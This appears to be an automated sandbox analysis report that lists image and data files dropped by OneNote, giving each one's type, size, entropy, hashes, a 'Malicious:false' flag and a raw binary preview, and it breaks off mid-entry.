                                                                                                                                                                                                              Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.326676262624994
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:TqHsjVLLzqtKFYnE5VLPYwvXWZMeBwv9eHotrdQqrIvpBXLsCkcB6at:Gslzq4FmE5VcwvXydBwv9eHERQyQpB5
                                                                                                                                                                                                              MD5:BD16B36F37B2224039B44606A0056F9C
                                                                                                                                                                                                              SHA1:DA22055AA5A6A0E01C4895D658DA686FD6A81EBF
                                                                                                                                                                                                              SHA-256:E04F56BE88BCA1649A0EE4B14C9F458A4BA9610742B72FF81E8CBB3033065168
                                                                                                                                                                                                              SHA-512:9B30B33776E67B2B0E762D4AA13AA3F78361CBE668BFE221B885A304AE90EE945D4EA8082786D2D4C367B614A664BA4DFAA98D141C62511FA46AC5568EF37031
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..e.......e$....!).a...m..e$....!).a...m..e..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................g.2..a....x....N...^...............l..R.B.M....c.%H........f........................................I.qk..B.....LZ................g.2..a....x............g.2..a....x...........e.......e.......e...........................................ej......eT.]....e.......e..B....eH......e..B....e..>.)..e..J...................;........4...4...4.."................e...e...e..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........e.......e....#..e............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24268
                                                                                                                                                                                                              Entropy (8bit):6.946124661664625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                                                                                              MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                                                                                              SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                                                                                              SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                                                                                              SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.326724371883214
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:VXMsDwGchw6vt06i+tFUEr02X3T9KColrdQqrDV+DBX2bl/hwPQL0iFvb1:VXMsMvG670EjXD9KCURQy+Mhj
                                                                                                                                                                                                              MD5:B1C864E77D53605CA4DB900AE448DB0B
                                                                                                                                                                                                              SHA1:2462C187399903BCA4931A771936E9B3FDDA222E
                                                                                                                                                                                                              SHA-256:CA9C871B06B0ADD8643A85EC34403270A846C27FBBF913FF6FB8D29904D2E685
                                                                                                                                                                                                              SHA-512:E30B0A74AD3C5B1477120EE261911B16209871CCD80EF3CAD821A2E75BD700D28852044FC5270F25AAC9385717BC8A9E06FD7C4D4C2B1F5E77CE4721007C868A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.iX......iX.....<.0.....iX.....<.0.....iX..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............d.....-.q.da`.....N...^................)..N'.B....T.#........f........................................I.qk..B.....LZ..............d.....-.q.da`...........d.....-.q.da`...........iX......iX......iX..........................................iXj.....iXT.]...iX......iX..B...iXH.....iX..B...iX..>.).iX..J...................;........4...4...4.."...............iX..iX..iX..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........iX......iX....#.iX............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):47294
                                                                                                                                                                                                              Entropy (8bit):7.497888607667405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                                                                                                                              MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                                                                                                                              SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                                                                                                                              SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                                                                                                                              SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.493115670799448
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nv0s8vCLo8L+t52EwLDeFLQIXRI96QDoprdQqr3+BXGakZ7vJ1:8sLck+KEwfNIXRI96QDQRQyuGbJ
                                                                                                                                                                                                              MD5:C0E49BB8C33610872592C608BBD32890
                                                                                                                                                                                                              SHA1:1AF40C845BA7799A9E62F10B915EA32716858020
                                                                                                                                                                                                              SHA-256:2C8B680149B676F4DD2245CFA55F68888A08CE3E6945AC4EE2140570D9B05083
                                                                                                                                                                                                              SHA-512:4F2E3F75C7038983A927898DD80F89C5FD88F6630AFCBCE6AE0594AE817D7A84F930AD3D8D0AFA62433DBD4180A8743E5D70F77BA50245594328C31459DD8E15
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZCm......Cm..R" ...h....Cm..R" ...h....Cm...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............%.V."...,8.....0....N...^...............s...t.H..@...i%........f........................................I.qk..B.....LZ............%.V."...,8.....0........%.V."...,8.....0.........Cm......Cm......Cm..........................................Cm.j....Cm.T.]..Cm......Cm...B..Cm.H....Cm...B..Cm...>.)Cm...J...................;........4...4...4.."..............Cm..Cm..Cm...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........Cm......Cm.....#Cm.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):347
                                                                                                                                                                                                              Entropy (8bit):6.85024426015615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                                                                                                                              MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                                                                                                                              SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                                                                                                                              SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                                                                                                                              SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.354729914326018
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:IhsiKheFElmeEXXQ9SGXkRQy8D7FsevB3Fm8:0swEiXXQ9SwkRJq
                                                                                                                                                                                                              MD5:E23CD18964ACFD11EDE150BD42476BCC
                                                                                                                                                                                                              SHA1:97610CF1ED2B5FFE5E9DD4381331F2AEE3402EB6
                                                                                                                                                                                                              SHA-256:CBB970400D83DC297A2BC464F052C9BF8C6E0FCEF89FAE388FD85323F5829D9D
                                                                                                                                                                                                              SHA-512:30EB3513CD7FFA58D88B2439BF64B51C9632A6B7DF0AB3362ACBBD8A2C41F4CD327E01299032D07E851C7BF993B9B04820BDE821CF406FB8F0D9D19B54BBD9C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ`.......`.. .0./.eH..Y.`.. .0./.eH..Y.`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................8)....Q.3.......N...^...............i-..B..I.....d..........f........................................I.qk..B.....LZ...............8)....Q.3..............8)....Q.3............`.......`.......`...........................................`..j....`..T.]..`.......`...B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........`.......`......#`..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):827
                                                                                                                                                                                                              Entropy (8bit):7.23139555596658
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                                                                                                                              MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                                                                                                                              SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                                                                                                                              SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                                                                                                                              SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.282507380369011
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:us6lb7qdt1bYEX24LxXr9KTwxoOKrdQqrsPd5v+DBXuDtnIVrUV:ussqd7YEXnVXr9K8x0RQysPGDZrU
                                                                                                                                                                                                              MD5:64A419D12D29BB7BCDFF3979A1CCE897
                                                                                                                                                                                                              SHA1:CE042D64B8A3303FE2E6284528255FED0D695C0B
                                                                                                                                                                                                              SHA-256:922351DA61CD8F349320A0F7D5701984BE8C7FEC540064D5BE7D057F6501AD98
                                                                                                                                                                                                              SHA-512:7479B75BCD62DC6AFA266ECA3EC2E6D1408FE0DD1EEAEFB6B3AB73F49B34243E6F871198AD16578A2BF70FF0DEC6CF6D98B6F2179D6D2B47BAD4B7E96265EF61
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZiul.....iul..Py......M.|iul..Py......M.|iul..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................v..0Y*._.......N...^....................,.E...X .WJ........f........................................I.qk..B.....LZ.................v..0Y*._................v..0Y*._............iul.....iul.....iul.........................................iulj....iulT.]..iul.....iul..B..iulH....iul..B..iul..>.)iul..J...................;........4...4...4.."..............iul.iul.iul..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........iul.....iul....#iul............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4410
                                                                                                                                                                                                              Entropy (8bit):7.857636973514526
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                                                                                                                              MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                                                                                                                              SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                                                                                                                              SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                                                                                                                              SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.334552225021651
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YtsDCh4QEbB5EZnf0MBXoYB9yU7sRQy9p+ShShyhDhnhShOgJhhh:msMEkB0IXoM9yU7sRJe
                                                                                                                                                                                                              MD5:76E7C65D24DC02FA5A0C542E1B0F4FB6
                                                                                                                                                                                                              SHA1:74C1EFF5F165C55B83854799400E08167185B225
                                                                                                                                                                                                              SHA-256:381F2E6EBC5DF97504ACA410B86B9FA4D3DF0462E3371020E2182E4379BF9C16
                                                                                                                                                                                                              SHA-512:1A489CC0FC3090C3B7D0851CAC83546A193A9677BD1503D9FE1DF0B7B4EA7A785B564E63E29F16DEDD50B633363440C953F56DA78BDC55DB569E24F7F4588C72
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZl......l...+..:9>./...l...+..:9>./...l...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Z..{.Yk....;W1X.....N...^...............i.!.[..C.b.6-.?.........f........................................I.qk..B.....LZ............Z..{.Yk....;W1X.........Z..{.Yk....;W1X..........l......l......l..........................................l.j....l.T.]..l......l..B..l.H....l...B..l...>.)l...J...................;........4...4...4.."..............l..l..l...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........l......l.....#l.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):136726
                                                                                                                                                                                                              Entropy (8bit):7.973487854173386
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                                                                                                                              MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                                                                                                                              SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                                                                                                                              SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                                                                                                                              SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.34528905429945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:6siyRRhbdWLWVtKOuEKHLJxXIO9OIotrdQqrCpYBXih4ipTR0G:6svdWLWV4ZEKHLX/9OIURQyZoR
                                                                                                                                                                                                              MD5:C908951592005F4A84C96BAA774889F0
                                                                                                                                                                                                              SHA1:63EDAFEAC74AE67626A769738EF18BECEE63CB2E
                                                                                                                                                                                                              SHA-256:EBA1789F5FEEF92C629702A50241731F86DB210BC53E42BB8B9319226E7D01E8
                                                                                                                                                                                                              SHA-512:EE377EE1ADCE417FB5CF870D16593FF8B26480CC7E77BB728A5A57252727FA5E14AA7FB3B3AFE7A851966734AD2CB3337F58F3B72F8A381871F352E8B9EE7BEF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.\-......\-Z..`....dh...\-Z..`....dh...\-..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............ux..$..:Y?1'`;.....N...^................a..m.K.H&:............f........................................I.qk..B.....LZ.............ux..$..:Y?1'`;..........ux..$..:Y?1'`;...........\-......\-......\-..........................................\-j.....\-T.]...\-......\-..B...\-H.....\-..B...\-..>.).\-..J...................;........4...4...4.."...............\-..\-..\-..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........\-......\-....#.\-............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5136
                                                                                                                                                                                                              Entropy (8bit):7.622045262603241
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                                                                                                                              MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                                                                                                                              SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                                                                                                                              SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                                                                                                                              SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.450890307120228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zWOspmlP2ZQBwatayEBU+XJ+9iYobBrdQqruaBXOg2vVZqap:VsHZkwaHE5XA9iYcRQy9Xix
                                                                                                                                                                                                              MD5:14DD510CA0147CB89F94E8A91FD9CEF0
                                                                                                                                                                                                              SHA1:F43D1E6931E0F63C623DA4915954BD39B61CDCC3
                                                                                                                                                                                                              SHA-256:03FFC187365873C081D80C5CBDDCAEFA888A7E40CD4C8F7351AC234CC70FB19D
                                                                                                                                                                                                              SHA-512:05048D82868A80B62617AB859A734C68DC26D9B49FFF0BE709CEC7A939EEDB92480C6D3D4FE2A3C16AC002BCB1090CFE491C16FC96A7A9B1A8F2D57EE2837322
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ..........._[...g...~...._[...g...~....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v.s>.*..".....9....N...^..................S.q.O.....d.o........f........................................I.qk..B.....LZ............v.s>.*..".....9........v.s>.*..".....9....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52945
                                                                                                                                                                                                              Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                              MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                              SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                              SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                              SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.44048658790621
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zWdPWDsOA4uaRtuOe5QEbLsXXAXDAtOey9e93VrdqrbafYxqxBXKbE240Z:iAsMuaRkaEbvXMt69e9FRyM6qxdm
                                                                                                                                                                                                              MD5:BC0043E5633B6D541CFA7227A32B4EC0
                                                                                                                                                                                                              SHA1:845B77BEBA7934A942E1CE0B4026464C36175756
                                                                                                                                                                                                              SHA-256:93DBE78EB0826DCC2DC97C3B8D99181A3685144F9CEA069861501E3C78A6072B
